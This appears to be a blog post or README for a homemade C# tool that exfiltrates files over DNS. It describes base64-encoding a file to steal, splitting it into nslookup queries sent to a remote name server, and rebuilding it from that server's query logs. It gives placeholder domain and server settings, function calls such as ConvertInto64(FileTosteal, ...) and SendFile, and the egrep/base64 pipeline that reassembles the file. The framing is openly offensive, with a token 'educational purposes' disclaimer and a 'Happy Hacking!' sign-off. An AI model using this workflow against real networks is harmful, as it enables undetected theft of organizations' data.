What is it?

Bad guys are using various methods to exfiltration data from organization or any target.basiclly they need to exfiltration data without being detected.most of organizations use firewalls and IDS to secure their network but allowing DNS(incoming/outgoing) 😀 so over the dns we can transfers files and other important stuff 😉 here i wrote a simple C# script to demonstrate the attack.For Educational Purposes Only

How does it work?

The idea is simple, the script will encode your data and split it into small parts and make nslookup requests to a remote server, then parse the logs on the remote server and decode the file.

Prerequisite



Linux box with DNS a server also you need to enable dns query logging 🙂

DnsExfiltration Script

this is how my configatution files looks like

Getting started



Download and edit DnsExfiltration Script static String Domain = “YOUR-DOMAIN-NAME”; //add your bind domain static String NSserver = “YOUR-NAME-SERVER”;//add your dns server ip address Call ConvertInto64(string FileTosteal,string PathTosaveEncodedFile) function in main method call SendFile(string PathTosaveEncodedFile) in linux box open terminal and run this command to Reassemble the file egrep -o “[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME” /var/log/qrlog | cut -d . -f1 | uniq | awk ‘!a[$0]++’ > /pathToSave/file.bin base64 -d file.bin > decoded.jpg Done!

Demo Video

i tested this script with following file types and its working 🙂

jpg 1Mb

mp3 3MB

exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664